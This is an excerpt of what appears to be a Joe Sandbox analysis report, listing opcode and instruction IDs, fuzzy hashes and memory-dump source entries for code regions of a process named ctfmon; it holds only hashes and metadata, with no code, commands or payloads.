                                                    • Opcode ID: feb9dc3965d103f33916121d096fe6f8a9058fc5d40d3f99283b621f499e39d2
                                                    • Instruction ID: b65892215ae7b9ab2af179dd0a7456df7c65439b245bd43199c2e87ed1e9596f
                                                    • Opcode Fuzzy Hash: feb9dc3965d103f33916121d096fe6f8a9058fc5d40d3f99283b621f499e39d2
                                                    • Instruction Fuzzy Hash: 8EC1E970E19A1D8FDB98EF58C8A4BADB7B1FF58304F5041A9E01DD7299CB34A981CB40
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26184017ea2fa26a07e4f701ac6431a1c59c3f9e84722c0c55e24ade43dd6925
                                                    • Instruction ID: 1b8e64bfb5718a6153f5cbceabca73439c7213190b0230c2e8412fff14c158c4
                                                    • Opcode Fuzzy Hash: 26184017ea2fa26a07e4f701ac6431a1c59c3f9e84722c0c55e24ade43dd6925
                                                    • Instruction Fuzzy Hash: FDB1E531A0CA478FE759DF68C4A06A0B7B0FF15354F5442B9D04EC7A96EB38B951CB84
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 599d305bff2d74b1439f923199a3701b46f63c4151ee0e928ea94b9d53861827
                                                    • Instruction ID: ce1fe1d0f39a363329ba43aacbd0b0e17c77c41ef6e30eb3c33dc0ac09159a4a
                                                    • Opcode Fuzzy Hash: 599d305bff2d74b1439f923199a3701b46f63c4151ee0e928ea94b9d53861827
                                                    • Instruction Fuzzy Hash: 2CB1E831B1DA878FD759DB68C0A05B0B7B0FF59350F9442B9D04ECBA86DB28B851C794
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d09860b0d63e8e9a832ed3bd447b2543928f152280d2c2e1e7683aba25fb8bc
                                                    • Instruction ID: eefb2ec3c893a5bfe28b793cd4476e669a10e2faec73e39e95a05050140f67e7
                                                    • Opcode Fuzzy Hash: 9d09860b0d63e8e9a832ed3bd447b2543928f152280d2c2e1e7683aba25fb8bc
                                                    • Instruction Fuzzy Hash: 16B1A13190D78D8FDB55EF68C8656ED7BB0FF19310F0501AAE848C71A2DB38AA55CB42
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 766115908f8597b747fc044ffd2c90cad58efd92660897409f449365f2e9256e
                                                    • Instruction ID: 8a363454902260ca206ce48923051f63ee22bc0557720b52ffe7146e809df49a
                                                    • Opcode Fuzzy Hash: 766115908f8597b747fc044ffd2c90cad58efd92660897409f449365f2e9256e
                                                    • Instruction Fuzzy Hash: 37B1A970A18A5D8FDBA8EB58C8A5BE9B7B1FF68344F5045E9D04DD3291CE346A80CF41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc6d3b73210481da90561d6e70887cacb0843fab7a7f32fa444400d74a78b30a
                                                    • Instruction ID: 9a4fe4b357f6c262e8b7d9d4171e9e2f2736f200fcbc5e93fe97b2b1f90f8735
                                                    • Opcode Fuzzy Hash: dc6d3b73210481da90561d6e70887cacb0843fab7a7f32fa444400d74a78b30a
                                                    • Instruction Fuzzy Hash: A0817832F0DB034FE7799A68946517577F0EF463D2B1606BED48ED3282EE28B8028755
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7cfa81faddb5f46ddc0f59dff8e12aff809c24dee29230c87653c626419043f3
                                                    • Instruction ID: 8a8944c77a22a802f01203c164aeba98ecb02b6e5749ffa642ec10cdcd710dbf
                                                    • Opcode Fuzzy Hash: 7cfa81faddb5f46ddc0f59dff8e12aff809c24dee29230c87653c626419043f3
                                                    • Instruction Fuzzy Hash: C3811232F0CB578FE7395A68946517577F0EF91390B14067EE0AAD3283EA28BC428795
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16bf22d094caf9ee747168b4dd8d869196436b38301a0c94549ed52bd373699d
                                                    • Instruction ID: 37731f9c3e2e006a058a78536558437b57a69f8504df43cc37c8786dca09a2e3
                                                    • Opcode Fuzzy Hash: 16bf22d094caf9ee747168b4dd8d869196436b38301a0c94549ed52bd373699d
                                                    • Instruction Fuzzy Hash: 83713732E0C94B4FE778DA58A8665B937E0FF44350B5403B9D09ED75B2FE18A806C789
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c109ee6b14741b5835897698743ec8435bb6dc74e2f349c88a88a2dd98a3a22e
                                                    • Instruction ID: 8de29eec4ba1b6a9f47722f85e229555f29dc92cd558de58e50ad6567d779040
                                                    • Opcode Fuzzy Hash: c109ee6b14741b5835897698743ec8435bb6dc74e2f349c88a88a2dd98a3a22e
                                                    • Instruction Fuzzy Hash: CD71B532E1C64F8EEB65DBA488619BC77B0FF55380F1006BAD00FEB1D5EE2868818744
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bd2cb0c28bbb91d6b73ca3018e74684a4296af7f54386dd025d377216219586
                                                    • Instruction ID: 517d09f5460da9d8b2da9b17d8a77320df6a5de39b5c98ab608bd0246a557f3b
                                                    • Opcode Fuzzy Hash: 6bd2cb0c28bbb91d6b73ca3018e74684a4296af7f54386dd025d377216219586
                                                    • Instruction Fuzzy Hash: 3C81D131A08B078FE378DB54C1A057177F1FF54344B9049BEC48AD7AA2CA39B882CB85
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d04eefa89b3de10f0a62ddbce0660f0c240623e5fb272dd908953c19976c1ec3
                                                    • Instruction ID: 2e4c9b6a945516ed3e3ed975e965b3a607399cf7ebe28b4185c24c6c818562f7
                                                    • Opcode Fuzzy Hash: d04eefa89b3de10f0a62ddbce0660f0c240623e5fb272dd908953c19976c1ec3
                                                    • Instruction Fuzzy Hash: 7E719232E1C64B8EEB69DBA484645BC7BB1FF45360F6406B9D00FE71C1EE286841C705
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c85d5c88922b9092659766e2704c87b4c19561089c8d2022a770a6bf3a8d778f
                                                    • Instruction ID: 8cff6a371f72664fed6d362139e85d47462eadcf0d0be4806028e1fa27eb659a
                                                    • Opcode Fuzzy Hash: c85d5c88922b9092659766e2704c87b4c19561089c8d2022a770a6bf3a8d778f
                                                    • Instruction Fuzzy Hash: 1C214831D4DA8C8FDB11EF99D8141E97BA0FF5A320F02027AE45CC3282DB799669C752
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a6da97bd4d505431f6dd2abe657bc0a63b5d4e3e1d9ac2567fd672b21155033
                                                    • Instruction ID: e762e09b44faa0d78c3a48e45a936e20b843141b1470deaa6aa87d06816998aa
                                                    • Opcode Fuzzy Hash: 8a6da97bd4d505431f6dd2abe657bc0a63b5d4e3e1d9ac2567fd672b21155033
                                                    • Instruction Fuzzy Hash: 91313612E1C59B8EE33A875C48705B47BA1EF92340B1947BAD08ADB4D7E82CAA81C345
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5665e6ee29bfbb2531ee23723eba3e22c0fd1ec1b541772f833d255c25ba4e2
                                                    • Instruction ID: 5c5d45fd468c0f8f812eef5f94cf45303fb07f5a683a14a304ba81ebc1f4746a
                                                    • Opcode Fuzzy Hash: c5665e6ee29bfbb2531ee23723eba3e22c0fd1ec1b541772f833d255c25ba4e2
                                                    • Instruction Fuzzy Hash: 07210A31E1891D8FDF9CEB58C4A5AEDB7B1FF58310F1002AAD01EE3295DA35A941CB44
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57fac0a751f2fd51c71b228c74cd4ec23db0d09e8a62aae86b90e7b547ceca9b
                                                    • Instruction ID: 1b05bd98fcfd855fe6c6381266240f514aa8e4554e860a57f756ee651cc902c8
                                                    • Opcode Fuzzy Hash: 57fac0a751f2fd51c71b228c74cd4ec23db0d09e8a62aae86b90e7b547ceca9b
                                                    • Instruction Fuzzy Hash: 1021FA31E0891D9FDF98EF58C465AECB7B1FF58314F0002AAD00EE3291DA35A941CB44
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeaafd2093c4e0cfd462baebdd99a54959f19e5be51e1631594cda204f5132ba
                                                    • Instruction ID: bbc2d689f824c28635d0dfefdf6e69737a8c80ea968a21e9360928d58d8675b9
                                                    • Opcode Fuzzy Hash: aeaafd2093c4e0cfd462baebdd99a54959f19e5be51e1631594cda204f5132ba
                                                    • Instruction Fuzzy Hash: E621A132F0861A8FEBA8EA98D865678B3F1FF49355F04067AD04FD3592DE256C418B84
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac0faa19ceb78677b1ab92e1f0bbb92f3369ec7ed509111352e4dd19e499192e
                                                    • Instruction ID: d78d21a46b2de15ba0c6353901495c4bf34de538f69ec067e2e3f227feadc4a2
                                                    • Opcode Fuzzy Hash: ac0faa19ceb78677b1ab92e1f0bbb92f3369ec7ed509111352e4dd19e499192e
                                                    • Instruction Fuzzy Hash: 77114231B086188FDB58DF58D895AA8B3F1FF59315F1042AAD04ED72A6DE31AC418B44
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7eb6b492fa81c7c0fb48521809a97143fcb87ed51991336629bafa135d506d3
                                                    • Instruction ID: 5d57d6af3055a9e7f929114d4bbc717daccfb99906dad91dd0186e5f34cadc14
                                                    • Opcode Fuzzy Hash: d7eb6b492fa81c7c0fb48521809a97143fcb87ed51991336629bafa135d506d3
                                                    • Instruction Fuzzy Hash: 6E21F913E0E2C38BE33642B458705B97F605F82360F5807FAD089960E7EC4C1555D386
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 940dd039688e46af1e2aae23ea3f74aa8d4f023b68f759a529bd9922b6158e7d
                                                    • Instruction ID: 27234a7789e19890aede625d7e617ae30017fb987824c809e2ecf7ff3b60e16d
                                                    • Opcode Fuzzy Hash: 940dd039688e46af1e2aae23ea3f74aa8d4f023b68f759a529bd9922b6158e7d
                                                    • Instruction Fuzzy Hash: 01112B36F1CD2B8AF63C8A4C50745B47671EF98354BE44775C04BDB48AD83CB8819B88
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d7b1580d26026962720fe43b268615c19e90557a2b7fcc4e61300217b06a5af
                                                    • Instruction ID: 1a8fa698cfadb4b8ab4afaaa208ed57e2ac2867a2cbb40643d14779fcbbbb6eb
                                                    • Opcode Fuzzy Hash: 9d7b1580d26026962720fe43b268615c19e90557a2b7fcc4e61300217b06a5af
                                                    • Instruction Fuzzy Hash: BF119D13F0E5939BF63866E418316BD26705F45BE0F5583FBE44EE62C6EC4C384192AA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0188f2be78bb058667bfa196408087d6ed3363901c62ec6dda0eb7c9b552fd32
                                                    • Instruction ID: a59ba2456546bcf0bb5342da8a246fbbec4d43b9683b9cac2fa78c5c68688d62
                                                    • Opcode Fuzzy Hash: 0188f2be78bb058667bfa196408087d6ed3363901c62ec6dda0eb7c9b552fd32
                                                    • Instruction Fuzzy Hash: 24119132F086098FEB58DA58D8A9AB8B3F1EF59315F00027AD04ED36A2DE2168418B44
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbcf88790e7a009d3e52e59200291f04eddd51ab18babf373126e3e7d04acbbc
                                                    • Instruction ID: c0f67f0147d022994af1c61cc0ac82ca0b933558d9430bfb71e55e4e1ce7a8fa
                                                    • Opcode Fuzzy Hash: dbcf88790e7a009d3e52e59200291f04eddd51ab18babf373126e3e7d04acbbc
                                                    • Instruction Fuzzy Hash: 9311E572F0864F4BFB7496A444686BE3AE5DF553C2F06063AE00AF7191EE647C418299
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a9feb82b83057ad41e4c34b462aed6f176d1714b81dd9ee4b2c77db36a9f59b
                                                    • Instruction ID: 2bf106014b39cd3d02afbe451d3a6e4d849af8efc5846d8a464345adcf36b0e2
                                                    • Opcode Fuzzy Hash: 5a9feb82b83057ad41e4c34b462aed6f176d1714b81dd9ee4b2c77db36a9f59b
                                                    • Instruction Fuzzy Hash: 052129B0A0878D8FCB49DF68C8955A97BF1FF68304F05066AE889D7291DB34E950CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 648b24123b5d7b6e6a620c14714c4574f4a0aa2ad126f7efa541a1d605933485
                                                    • Instruction ID: bd5b78753b6259b3d68020a914b046dc1c1c0b5e33861d1964854ac4fa85ed14
                                                    • Opcode Fuzzy Hash: 648b24123b5d7b6e6a620c14714c4574f4a0aa2ad126f7efa541a1d605933485
                                                    • Instruction Fuzzy Hash: 95112B70908A4D8FDF85EF58C8599E97BF0FF28305F0501AAD448D72A1D734E584CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce2ed485ffaac7092301ef1f05e1b7f5265cd20138e00a45215219359f57b2ef
                                                    • Instruction ID: ffd892fa700974abe0aa1519e84835c74fba310557a43db662bf590e46787c69
                                                    • Opcode Fuzzy Hash: ce2ed485ffaac7092301ef1f05e1b7f5265cd20138e00a45215219359f57b2ef
                                                    • Instruction Fuzzy Hash: 4E118831A087078FD314CF14C0A06F0B3F0FF10320B41063ED48687A96EB687842CB94
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a9e5245fa6b83271baaf77257f754be191a3edb9b5b40408be01a5980c83f08
                                                    • Instruction ID: 434b42ce676a9ff1d9816a124562b6753891d7297483f6d77f2a5286f206b75c
                                                    • Opcode Fuzzy Hash: 5a9e5245fa6b83271baaf77257f754be191a3edb9b5b40408be01a5980c83f08
                                                    • Instruction Fuzzy Hash: CE1121326487078FD365DA24D4A06A1B3F0FF11360B9046BAC486C7AA6DB69B842CB80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26a38efc215bf31128917e7a72287791dbd543770e468fc4abe03a22e1c0bfc6
                                                    • Instruction ID: d6b5ac152347c98b4adfad764ac12090533ea4fd67e30bff98e8a296946bec79
                                                    • Opcode Fuzzy Hash: 26a38efc215bf31128917e7a72287791dbd543770e468fc4abe03a22e1c0bfc6
                                                    • Instruction Fuzzy Hash: BA01803190891E8FDF94EF68C858AEAB7F0FF68305F0405AAE41CD7191DB30A590CB80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c2f561a55cb62089d923b952abe9f11bff42b6de8d5fb9e04d70485a226ac4
                                                    • Instruction ID: afbee64094a4f67ab5a64c0215975e64f1fce3d2fd5ea7b71b5d288575357e58
                                                    • Opcode Fuzzy Hash: d7c2f561a55cb62089d923b952abe9f11bff42b6de8d5fb9e04d70485a226ac4
                                                    • Instruction Fuzzy Hash: 46112D70908A8D8FDF85EF68C859AAA7FF0FF64304F0505ABD458D71A2DB74A554CB80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a43992373088c2c48a6bae902bd627414f05ceac60cc884833d1f50b888dc81
                                                    • Instruction ID: 9372e926dcc50e3460efbe09fc74a38a04d34903312e4e82cc8827d0622aa6eb
                                                    • Opcode Fuzzy Hash: 7a43992373088c2c48a6bae902bd627414f05ceac60cc884833d1f50b888dc81
                                                    • Instruction Fuzzy Hash: 03F0D13098E2CA2FD713A7B44C651E87FB0EF12304F0945E3D498C6093C6286259C752
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a5436ce86a9096d446b9e4363fbb67313569c01f31537b8cd0e911a443527ae
                                                    • Instruction ID: 50b2e7047b6f9707ce1487abdf23ac9ea3aa0028d18fc73017d5d503925893a3
                                                    • Opcode Fuzzy Hash: 1a5436ce86a9096d446b9e4363fbb67313569c01f31537b8cd0e911a443527ae
                                                    • Instruction Fuzzy Hash: 4F01717054E7CA4FD7179B644C611E57FB0AF17204F0905E7D4D8C7093C62C6969C792
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb153e543b13854c17d009fbbab9635d3e8882939227c19946f02616fb3de96a
                                                    • Instruction ID: 81f9903e3f62e06df8379e7880721f04b5e08519f44c5df77ab4bdc293f76129
                                                    • Opcode Fuzzy Hash: bb153e543b13854c17d009fbbab9635d3e8882939227c19946f02616fb3de96a
                                                    • Instruction Fuzzy Hash: 03014C70A0968D8FCF85DF58C8586EA7BB0FF64304F0445AAD458C72A1DB74E954CB80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ecabe2eda215fd694cf7c5cda30c4047fc0827e4530587265faa7727eef0243
                                                    • Instruction ID: 507b9a157c5d52f1ef5f934df6ea46ce9566c458a6b3b1878b0865d0d11f1289
                                                    • Opcode Fuzzy Hash: 1ecabe2eda215fd694cf7c5cda30c4047fc0827e4530587265faa7727eef0243
                                                    • Instruction Fuzzy Hash: D4016B7091490E9FDF94EF58C858AAEB7F0FB68305F10456AA41DD3254DB71A694CB80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6733af3c5741cd10a5af96c8f5ca482c29bd9f7fa177a35cc45b8e4406087d4c
                                                    • Instruction ID: 59b21789fadf0e63eced7f15be33ddb351c229ce575cecaca6af9d8a91458235
                                                    • Opcode Fuzzy Hash: 6733af3c5741cd10a5af96c8f5ca482c29bd9f7fa177a35cc45b8e4406087d4c
                                                    • Instruction Fuzzy Hash: FAF0D622E0D54B8FD77896A884715B437A0EF54360B0103F7D04FDA6D2FD18A8808745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e9086e0dd96e481c9c50a7eea49c8f89c81e8241d47e2d101ccc4a891127a37d
• Instruction ID: a29696a42daf9683beca3ecac1cb3457bf5d8776a13b07feddc701e9797a87de
• Opcode Fuzzy Hash: e9086e0dd96e481c9c50a7eea49c8f89c81e8241d47e2d101ccc4a891127a37d
• Instruction Fuzzy Hash: 59F0EC30A1494D8FDB94EF68C488BE977E0FF28305F0041A6E81CC71A5CB30E5A0CB80

Memory Dump Source
• Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b0309836015f15174a60e6eee3fbc89aa6f6ccfc04e1548d080504013516a06
• Instruction ID: 37735a37c73d378ef7ed07a84367e626e800b0a240d53f260cf2910540499c85
• Opcode Fuzzy Hash: 2b0309836015f15174a60e6eee3fbc89aa6f6ccfc04e1548d080504013516a06
